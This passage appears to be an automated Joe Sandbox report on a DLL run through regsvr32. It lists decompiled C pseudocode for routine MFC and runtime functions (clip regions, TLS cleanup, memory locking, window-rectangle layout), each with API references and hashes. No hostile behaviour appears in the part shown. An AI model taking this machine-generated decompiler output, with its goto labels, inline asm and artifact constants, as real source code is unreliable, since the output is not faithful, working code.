                                                                                                                  • Part of subcall function 100514F8: TlsGetValue.KERNEL32 ref: 10051502
                                                                                                                • __freefls@4.LIBCMT ref: 1004C931
                                                                                                                  • Part of subcall function 1005153D: __decode_pointer.LIBCMT ref: 1005154B
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 1004C903
                                                                                                                • ExitThread.KERNEL32 ref: 1004C90A
                                                                                                                • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 1004C910
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2731880238-0
                                                                                                                • Opcode ID: eeff3220b4e3d4111d560619d6bed87ca2da64caf98b4cfa3b310ab2fe29a7af
                                                                                                                • Instruction ID: 107d468faa5f2f46790708104265d17c1d0834f367b3a6405ef7d8c8fef7de54
                                                                                                                • Opcode Fuzzy Hash: eeff3220b4e3d4111d560619d6bed87ca2da64caf98b4cfa3b310ab2fe29a7af
                                                                                                                • Instruction Fuzzy Hash: F8019E7C40065AEFEB44DBA0C949D9E7BE4EF88344B208468F905C3122DB34E88ACA55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000C235(void* __ecx, int _a4) {
                                                                                                                				int _t7;
                                                                                                                				void* _t16;
                                                                                                                				void* _t20;
                                                                                                                
                                                                                                                				_t7 = SelectClipPath( *(__ecx + 4), _a4);
                                                                                                                				if(_t7 != 0) {
                                                                                                                					_t16 = 1;
                                                                                                                					if( *(__ecx + 4) !=  *(__ecx + 8)) {
                                                                                                                						_t20 = CreateRectRgn(0, 0, 0, 0);
                                                                                                                						if(GetClipRgn( *(__ecx + 4), _t20) < 0 || SelectClipRgn( *(__ecx + 8), _t20) == 0) {
                                                                                                                							_t16 = 0;
                                                                                                                						}
                                                                                                                						DeleteObject(_t20);
                                                                                                                					}
                                                                                                                					return _t16;
                                                                                                                				}
                                                                                                                				return _t7;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • SelectClipPath.GDI32(?,?), ref: 1000C23F
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1000C25E
                                                                                                                • GetClipRgn.GDI32(?,00000000), ref: 1000C26A
                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 1000C278
                                                                                                                • DeleteObject.GDI32(00000000), ref: 1000C285
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clip$Select$CreateDeleteObjectPathRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1230964757-0
                                                                                                                • Opcode ID: c5a595ff58a55da9221d8328392afdc812a962fa1ed36d5cdbb8174e9c783db7
                                                                                                                • Instruction ID: 47a7a4d585018c910710f035c3deb9cf876d6beea01288e339afd1202d7d3335
                                                                                                                • Opcode Fuzzy Hash: c5a595ff58a55da9221d8328392afdc812a962fa1ed36d5cdbb8174e9c783db7
                                                                                                                • Instruction Fuzzy Hash: B2F01D31241311AFF360AFA1CE89F17BBA9EB46B91F018828F546D2570CBA0AC04CA20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10020B1B(long* __ecx) {
                                                                                                                				intOrPtr _t4;
                                                                                                                				long _t5;
                                                                                                                				void* _t6;
                                                                                                                				void* _t13;
                                                                                                                				intOrPtr _t14;
                                                                                                                				long* _t15;
                                                                                                                
                                                                                                                				_t15 = __ecx;
                                                                                                                				_t4 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                				if(_t4 != 0) {
                                                                                                                					do {
                                                                                                                						_t14 =  *((intOrPtr*)(_t4 + 4));
                                                                                                                						E10020973(__ecx, _t4, 0);
                                                                                                                						_t4 = _t14;
                                                                                                                					} while (_t14 != 0);
                                                                                                                				}
                                                                                                                				_t5 =  *_t15;
                                                                                                                				if(_t5 != 0xffffffff) {
                                                                                                                					TlsFree(_t5);
                                                                                                                				}
                                                                                                                				_t6 = _t15[4];
                                                                                                                				if(_t6 != 0) {
                                                                                                                					_t13 = GlobalHandle(_t6);
                                                                                                                					GlobalUnlock(_t13);
                                                                                                                					_t6 = GlobalFree(_t13);
                                                                                                                				}
                                                                                                                				DeleteCriticalSection( &(_t15[7]));
                                                                                                                				return _t6;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • TlsFree.KERNEL32(?), ref: 10020B41
                                                                                                                • GlobalHandle.KERNEL32(?), ref: 10020B4F
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 10020B58
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10020B5F
                                                                                                                • DeleteCriticalSection.KERNEL32 ref: 10020B69
                                                                                                                  • Part of subcall function 10020973: EnterCriticalSection.KERNEL32(?), ref: 100209D0
                                                                                                                  • Part of subcall function 10020973: LeaveCriticalSection.KERNEL32(?,?), ref: 100209E0
                                                                                                                  • Part of subcall function 10020973: LocalFree.KERNEL32(?), ref: 100209E9
                                                                                                                  • Part of subcall function 10020973: TlsSetValue.KERNEL32(?,00000000), ref: 100209FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 1549993015-0
                                                                                                                • Opcode ID: b01807da667867a865fc57cb7c327d3e1d9e9fe6a26b645f8b737c5b1a19c065
                                                                                                                • Instruction ID: 6cf608fd225a27a97259cdcb4c701323467a0350138c016028cf72fe5f14c0e7
                                                                                                                • Opcode Fuzzy Hash: b01807da667867a865fc57cb7c327d3e1d9e9fe6a26b645f8b737c5b1a19c065
                                                                                                                • Instruction Fuzzy Hash: FEF0E9356003209FE322DF38AD88E6B72FEEF86650B650149FD05C3252D734DC018660
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1000BC25(intOrPtr _a4) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t8;
                                                                                                                				void* _t9;
                                                                                                                				void* _t15;
                                                                                                                				void* _t17;
                                                                                                                				intOrPtr _t20;
                                                                                                                
                                                                                                                				_t20 = _a4;
                                                                                                                				_t15 = GlobalLock( *(_t20 + 0xc));
                                                                                                                				if(_t15 != 0) {
                                                                                                                					_t8 = GlobalLock( *(_t20 + 8));
                                                                                                                					__eflags = _t8;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						_push(_t8);
                                                                                                                						_push(_t15);
                                                                                                                						_t9 = E1000BA16(_t15, _t17, GlobalLock, _t20, __eflags);
                                                                                                                						GlobalUnlock( *(_t20 + 0xc));
                                                                                                                						GlobalUnlock( *(_t20 + 8));
                                                                                                                						return _t9;
                                                                                                                					}
                                                                                                                					GlobalUnlock( *(_t20 + 0xc));
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • GlobalLock.KERNEL32 ref: 1000BC35
                                                                                                                • GlobalLock.KERNEL32 ref: 1000BC44
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 1000BC4D
                                                                                                                  • Part of subcall function 1000BA16: __EH_prolog3_GS.LIBCMT ref: 1000BA1D
                                                                                                                  • Part of subcall function 1000BA16: __alloca_probe_16.LIBCMT ref: 1000BAFA
                                                                                                                  • Part of subcall function 1000BA16: CoTaskMemAlloc.OLE32(?), ref: 1000BB41
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 1000BC67
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 1000BC6C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Unlock$Lock$AllocH_prolog3_Task__alloca_probe_16
                                                                                                                • String ID:
                                                                                                                • API String ID: 1323298786-0
                                                                                                                • Opcode ID: 6498b7e41d7b98b0c12b49beaeabd060f1d80820e3d9cf9becf0d3cf71dd153b
                                                                                                                • Instruction ID: c600b051740266f3091284cb5df07c1a2b98d22017044a12e2a4374295ff7298
                                                                                                                • Opcode Fuzzy Hash: 6498b7e41d7b98b0c12b49beaeabd060f1d80820e3d9cf9becf0d3cf71dd153b
                                                                                                                • Instruction Fuzzy Hash: 00F08275200A05AFF720AF65CC84C07B7EDEF952903158835FA5192130DB31EC109A10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 25%
                                                                                                                			E100246AA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t21;
                                                                                                                				intOrPtr* _t23;
                                                                                                                				void* _t24;
                                                                                                                
                                                                                                                				E1004764D(0x1008f78c, __ebx, __edi, __esi);
                                                                                                                				_t21 =  *((intOrPtr*)(_t24 + 0xc));
                                                                                                                				_t23 = __imp__#7;
                                                                                                                				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
                                                                                                                				E1002285D(__ebx,  *((intOrPtr*)(_t24 + 8)), _t21, _t24,  *_t23(_t21, 0));
                                                                                                                				_push(_t21);
                                                                                                                				if( *_t23() > 0) {
                                                                                                                					E10022B9D( *((intOrPtr*)(_t24 + 8)), _t21, _t21,  *_t23(_t21) + _t14);
                                                                                                                				}
                                                                                                                				__imp__#6(_t21);
                                                                                                                				return E10047725( *((intOrPtr*)(_t24 + 8)));
                                                                                                                			}







                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$FreeH_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 315669285-0
                                                                                                                • Opcode ID: 1f65b4bf3e8025871e6c3f7dba31e3d88d0171a9be26f73c8f8c0b216a005208
                                                                                                                • Instruction ID: 9c161dffb03ac8c6011b1bdbd1b2ee79063cf2212ae75fd4fa33748ab2b7d01d
                                                                                                                • Opcode Fuzzy Hash: 1f65b4bf3e8025871e6c3f7dba31e3d88d0171a9be26f73c8f8c0b216a005208
                                                                                                                • Instruction Fuzzy Hash: 1DE06D39900118BBEB01EB74CC85FBE3BB8EF86780F404059F904E7241CB34A9129AA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 67%
                                                                                                                			E1003F212(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				intOrPtr* _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr* _v28;
                                                                                                                				signed int _v32;
                                                                                                                				struct tagRECT _v48;
                                                                                                                				struct tagRECT _v64;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr _t181;
                                                                                                                				intOrPtr _t182;
                                                                                                                				intOrPtr _t185;
                                                                                                                				signed char _t187;
                                                                                                                				intOrPtr* _t189;
                                                                                                                				signed char _t193;
                                                                                                                				signed int _t196;
                                                                                                                				intOrPtr* _t210;
                                                                                                                				intOrPtr _t213;
                                                                                                                				intOrPtr* _t214;
                                                                                                                				signed int _t223;
                                                                                                                				signed int _t230;
                                                                                                                				intOrPtr* _t232;
                                                                                                                				void* _t243;
                                                                                                                				intOrPtr _t257;
                                                                                                                				signed int _t264;
                                                                                                                				signed int _t273;
                                                                                                                				signed int _t276;
                                                                                                                				signed int _t278;
                                                                                                                				intOrPtr* _t281;
                                                                                                                				intOrPtr _t282;
                                                                                                                				intOrPtr* _t286;
                                                                                                                				void* _t290;
                                                                                                                				intOrPtr _t291;
                                                                                                                				intOrPtr* _t293;
                                                                                                                
                                                                                                                				_t281 = _a4;
                                                                                                                				_push(0);
                                                                                                                				_t232 = __ecx;
                                                                                                                				_push(0);
                                                                                                                				_push(0x418);
                                                                                                                				_v8 = 0;
                                                                                                                				 *_t281 = 0;
                                                                                                                				 *((intOrPtr*)(_t281 + 4)) = 0;
                                                                                                                				 *((intOrPtr*)( *__ecx + 0x110))();
                                                                                                                				_v16 = 0;
                                                                                                                				if(0 != 0) {
                                                                                                                					_t276 = 0x14;
                                                                                                                					_t277 = 0 * _t276 >> 0x20;
                                                                                                                					_t185 = E10009F14(0,  ~0x00BADBAD | 0 * _t276);
                                                                                                                					_t290 = 0;
                                                                                                                					_v8 = _t185;
                                                                                                                					if(_v16 > 0) {
                                                                                                                						_t282 = _t185;
                                                                                                                						do {
                                                                                                                							E1003DEA1(_t232, _t290, _t282);
                                                                                                                							_t290 = _t290 + 1;
                                                                                                                							_t282 = _t282 + 0x14;
                                                                                                                						} while (_t290 < _v16);
                                                                                                                						_t291 = _v16;
                                                                                                                						_t281 = _a4;
                                                                                                                						_t243 = 0;
                                                                                                                						if(_t291 > 0) {
                                                                                                                							_t187 =  *(_t232 + 0x80);
                                                                                                                							if((_t187 & 0x00000002) == 0) {
                                                                                                                								_t277 = _t187 & 0x00000004;
                                                                                                                								if((_t187 & 0x00000004) == 0) {
                                                                                                                									L20:
                                                                                                                									_push(_t243);
                                                                                                                									asm("sbb eax, eax");
                                                                                                                									_t223 =  ~(_a8 & 0x00000002) & 0x00007fff;
                                                                                                                									__eflags = _t223;
                                                                                                                									_push(_t223);
                                                                                                                								} else {
                                                                                                                									if((_a8 & 0x00000004) == 0) {
                                                                                                                										__eflags = _a8 & 0x00000008;
                                                                                                                										if((_a8 & 0x00000008) == 0) {
                                                                                                                											__eflags = _a8 & 0x00000010;
                                                                                                                											if((_a8 & 0x00000010) == 0) {
                                                                                                                												__eflags = _a12 - 0xffffffff;
                                                                                                                												if(_a12 == 0xffffffff) {
                                                                                                                													__eflags = _t187 & 0x00000001;
                                                                                                                													if((_t187 & 0x00000001) != 0) {
                                                                                                                														goto L8;
                                                                                                                													} else {
                                                                                                                														goto L20;
                                                                                                                													}
                                                                                                                												} else {
                                                                                                                													SetRectEmpty( &_v48);
                                                                                                                													 *((intOrPtr*)( *_t232 + 0x140))( &_v48, _a8 & 0x00000002);
                                                                                                                													_t230 = _a8 & 0x00000020;
                                                                                                                													__eflags = _t230;
                                                                                                                													if(_t230 == 0) {
                                                                                                                														_t273 = _v48.right - _v48.left;
                                                                                                                														__eflags = _t273;
                                                                                                                													} else {
                                                                                                                														_t273 = _v48.bottom - _v48.top;
                                                                                                                													}
                                                                                                                													_push(_t230);
                                                                                                                													_t243 = _t273 + _a12;
                                                                                                                													goto L13;
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_push(0);
                                                                                                                												L13:
                                                                                                                												_push(_t243);
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											_push(0);
                                                                                                                											_push(0x7fff);
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										L8:
                                                                                                                										_push(_t243);
                                                                                                                										_push( *((intOrPtr*)(_t232 + 0x70)));
                                                                                                                									}
                                                                                                                								}
                                                                                                                								_push(_t291);
                                                                                                                								_push(_v8);
                                                                                                                								E1003E9C6(_t232, _t277);
                                                                                                                							}
                                                                                                                							_t189 = E1003E897(_t232,  &(_v48.right), _v8, _t291);
                                                                                                                							 *_t281 =  *_t189;
                                                                                                                							 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t189 + 4));
                                                                                                                							if((_a8 & 0x00000040) != 0) {
                                                                                                                								_v24 = 0;
                                                                                                                								_a12 = 0;
                                                                                                                								_v48.bottom =  *((intOrPtr*)(_t232 + 0xa0));
                                                                                                                								 *((intOrPtr*)(_t232 + 0xa0)) = 0;
                                                                                                                								if(_t291 > 0) {
                                                                                                                									_t210 = _v8 + 4;
                                                                                                                									_v28 = _t210;
                                                                                                                									_t257 = _t291;
                                                                                                                									do {
                                                                                                                										if(( *(_t210 + 5) & 0x00000001) != 0 &&  *_t210 != 0) {
                                                                                                                											_a12 = _a12 + 1;
                                                                                                                										}
                                                                                                                										_t210 = _t210 + 0x14;
                                                                                                                										_t257 = _t257 - 1;
                                                                                                                									} while (_t257 != 0);
                                                                                                                									_t314 = _a12;
                                                                                                                									if(_a12 > 0) {
                                                                                                                										_t278 = 0x18;
                                                                                                                										_t213 = E10009F14(_t314,  ~(0 | _t314 > 0x00000000) | _a12 * _t278);
                                                                                                                										_t73 = _t213 + 8; // 0x8
                                                                                                                										_t286 = _t73;
                                                                                                                										_v24 = _t213;
                                                                                                                										_t214 = _v28;
                                                                                                                										_v32 = _a12;
                                                                                                                										_t264 = 0;
                                                                                                                										_a12 = 0;
                                                                                                                										_v12 = 0;
                                                                                                                										_v20 = _t286;
                                                                                                                										_v28 = _t214;
                                                                                                                										while(1) {
                                                                                                                											_t277 = _v32;
                                                                                                                											if(_a12 >= _v32) {
                                                                                                                												break;
                                                                                                                											}
                                                                                                                											if(( *(_t214 + 5) & 0x00000001) != 0 &&  *_t214 != 0) {
                                                                                                                												 *((intOrPtr*)(_t286 - 8)) = _t264;
                                                                                                                												_t277 =  &_v64;
                                                                                                                												 *((intOrPtr*)(_t286 - 4)) =  *_t214;
                                                                                                                												 *((intOrPtr*)( *_t232 + 0x170))(_t264,  &_v64);
                                                                                                                												E1000C931(_t232,  &_v64);
                                                                                                                												_a12 = _a12 + 1;
                                                                                                                												_v20 = _v20 + 0x18;
                                                                                                                												_t264 = _v12;
                                                                                                                												_t214 = _v28;
                                                                                                                												asm("movsd");
                                                                                                                												asm("movsd");
                                                                                                                												asm("movsd");
                                                                                                                												asm("movsd");
                                                                                                                												_t286 = _v20;
                                                                                                                											}
                                                                                                                											_t264 = _t264 + 1;
                                                                                                                											_t214 = _t214 + 0x14;
                                                                                                                											_v12 = _t264;
                                                                                                                											_v28 = _t214;
                                                                                                                											if(_t264 < _v16) {
                                                                                                                												continue;
                                                                                                                											}
                                                                                                                											break;
                                                                                                                										}
                                                                                                                										_t291 = _v16;
                                                                                                                										_t281 = _a4;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								_t193 =  *(_t232 + 0x80);
                                                                                                                								if((_t193 & 0x00000001) != 0 && (_t193 & 0x00000004) != 0) {
                                                                                                                									 *((intOrPtr*)(_t232 + 0x70)) =  *_t281;
                                                                                                                								}
                                                                                                                								_v12 = _v12 & 0x00000000;
                                                                                                                								_t323 = _t291;
                                                                                                                								if(_t291 > 0) {
                                                                                                                									_v20 = _v8;
                                                                                                                									do {
                                                                                                                										E1003E699(_t232, _t277, _t323, _v12, _v20);
                                                                                                                										_v12 = _v12 + 1;
                                                                                                                										_v20 = _v20 + 0x14;
                                                                                                                									} while (_v12 < _t291);
                                                                                                                								}
                                                                                                                								if(_a12 > 0) {
                                                                                                                									_t293 = _v24 + 8;
                                                                                                                									_v20 = _t293;
                                                                                                                									do {
                                                                                                                										_t196 = E1001768F(_t232,  *((intOrPtr*)(_t293 - 4)));
                                                                                                                										_v32 = _t196;
                                                                                                                										if(_t196 != 0) {
                                                                                                                											GetWindowRect( *(_t196 + 0x20),  &_v64);
                                                                                                                											 *((intOrPtr*)( *_t232 + 0x170))( *((intOrPtr*)(_v20 - 8)),  &_v64);
                                                                                                                											E10017C59(_v32, 0, _v64.left -  *_t293 + _v64.left, _v64.top -  *((intOrPtr*)(_t293 + 4)) + _v64.top, 0, 0, 0x15);
                                                                                                                											_t293 = _v20;
                                                                                                                											_t281 = _a4;
                                                                                                                										}
                                                                                                                										_t293 = _t293 + 0x18;
                                                                                                                										_t142 =  &_a12;
                                                                                                                										 *_t142 = _a12 - 1;
                                                                                                                										_t329 =  *_t142;
                                                                                                                										_v20 = _t293;
                                                                                                                									} while ( *_t142 != 0);
                                                                                                                									_push(_v24);
                                                                                                                									E10009F3F(_t232, _t281, _t293, _t329);
                                                                                                                								}
                                                                                                                								 *((intOrPtr*)(_t232 + 0xa0)) = _v48.bottom;
                                                                                                                							}
                                                                                                                							_push(_v8);
                                                                                                                							E10009F3F(_t232, _t281, _t291, _t329);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				SetRectEmpty( &_v64);
                                                                                                                				 *((intOrPtr*)( *_t232 + 0x140))( &_v64, _a8 & 0x00000002);
                                                                                                                				 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t281 + 4)) + _v64.top - _v64.bottom;
                                                                                                                				 *_t281 =  *_t281 + _v64.left - _v64.right;
                                                                                                                				E10042C79( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
                                                                                                                				_t181 =  *_t281;
                                                                                                                				if(_t181 <= _v48.right) {
                                                                                                                					_t181 = _v48.right;
                                                                                                                				}
                                                                                                                				 *_t281 = _t181;
                                                                                                                				_t182 =  *((intOrPtr*)(_t281 + 4));
                                                                                                                				if(_t182 <= _v48.bottom) {
                                                                                                                					_t182 = _v48.bottom;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t281 + 4)) = _t182;
                                                                                                                				return _t281;
                                                                                                                			}









































                                                                                                                0x1003f41e
                                                                                                                0x1003f421
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003f421
                                                                                                                0x1003f423
                                                                                                                0x1003f426
                                                                                                                0x1003f426
                                                                                                                0x1003f38d
                                                                                                                0x1003f429
                                                                                                                0x1003f431
                                                                                                                0x1003f439
                                                                                                                0x1003f439
                                                                                                                0x1003f43c
                                                                                                                0x1003f440
                                                                                                                0x1003f442
                                                                                                                0x1003f447
                                                                                                                0x1003f44a
                                                                                                                0x1003f452
                                                                                                                0x1003f457
                                                                                                                0x1003f45a
                                                                                                                0x1003f45e
                                                                                                                0x1003f44a
                                                                                                                0x1003f467
                                                                                                                0x1003f473
                                                                                                                0x1003f476
                                                                                                                0x1003f47c
                                                                                                                0x1003f481
                                                                                                                0x1003f488
                                                                                                                0x1003f48b
                                                                                                                0x1003f494
                                                                                                                0x1003f4b7
                                                                                                                0x1003f4d3
                                                                                                                0x1003f4d8
                                                                                                                0x1003f4db
                                                                                                                0x1003f4db
                                                                                                                0x1003f4de
                                                                                                                0x1003f4e1
                                                                                                                0x1003f4e1
                                                                                                                0x1003f4e1
                                                                                                                0x1003f4e4
                                                                                                                0x1003f4e4
                                                                                                                0x1003f4e9
                                                                                                                0x1003f4ec
                                                                                                                0x1003f4f1
                                                                                                                0x1003f4f5
                                                                                                                0x1003f4f5
                                                                                                                0x1003f4fb
                                                                                                                0x1003f4fe
                                                                                                                0x1003f503
                                                                                                                0x1003f287
                                                                                                                0x1003f263
                                                                                                                0x1003f508
                                                                                                                0x1003f51d
                                                                                                                0x1003f52a
                                                                                                                0x1003f535
                                                                                                                0x1003f542
                                                                                                                0x1003f547
                                                                                                                0x1003f54c
                                                                                                                0x1003f54e
                                                                                                                0x1003f54e
                                                                                                                0x1003f551
                                                                                                                0x1003f553
                                                                                                                0x1003f559
                                                                                                                0x1003f55b
                                                                                                                0x1003f55b
                                                                                                                0x1003f55e
                                                                                                                0x1003f567

                                                                                                                APIs
                                                                                                                • SetRectEmpty.USER32(?), ref: 1003F508
                                                                                                                  • Part of subcall function 10009F14: _malloc.LIBCMT ref: 10009F2E
                                                                                                                • GetWindowRect.USER32 ref: 1003F494
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$EmptyWindow_malloc
                                                                                                                • String ID: @
                                                                                                                • API String ID: 299164714-2766056989
                                                                                                                • Opcode ID: 231956de7690e02c2dc6420e6d14d227eb916f6845a0a5c2140db660af6d1e05
                                                                                                                • Instruction ID: caa1d8ef8b3ff2674ffc05b96da04f017d462dea4e3151a0d893637e03f8ddd5
                                                                                                                • Opcode Fuzzy Hash: 231956de7690e02c2dc6420e6d14d227eb916f6845a0a5c2140db660af6d1e05
                                                                                                                • Instruction Fuzzy Hash: 88C1197190021AAFCF05CFA8C885AEEBBF5FF48355F11856DE856AB251DB34AA40CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E10017057(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				intOrPtr _v44;
                                                                                                                				char _v48;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr* _t33;
                                                                                                                				intOrPtr* _t35;
                                                                                                                				intOrPtr* _t36;
                                                                                                                				void* _t38;
                                                                                                                				intOrPtr* _t52;
                                                                                                                				void* _t54;
                                                                                                                				intOrPtr _t55;
                                                                                                                				void* _t58;
                                                                                                                				void* _t60;
                                                                                                                				intOrPtr _t62;
                                                                                                                
                                                                                                                				_t62 = E1001DD4F(_t54, _t58, _t60, __eflags) + 0x7c;
                                                                                                                				_t55 =  *((intOrPtr*)(E1001E302(_t54, _t58, _t62, __eflags) + 8));
                                                                                                                				if(_a8 != 0 || _a12 != 0) {
                                                                                                                					L4:
                                                                                                                					_v8 =  *((intOrPtr*)(E10049097(__eflags)));
                                                                                                                					_t33 = E10049097(__eflags);
                                                                                                                					_push(_a16);
                                                                                                                					 *_t33 = 0;
                                                                                                                					_push(_a12);
                                                                                                                					_push(_a8);
                                                                                                                					_push(_a4);
                                                                                                                					E1004C1D3(_t62, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t55);
                                                                                                                					goto L5;
                                                                                                                				} else {
                                                                                                                					_t69 = _a16;
                                                                                                                					if(_a16 != 0) {
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                					_v8 =  *((intOrPtr*)(E10049097(_t69)));
                                                                                                                					_t52 = E10049097(_t69);
                                                                                                                					_push(_a4);
                                                                                                                					 *_t52 = 0;
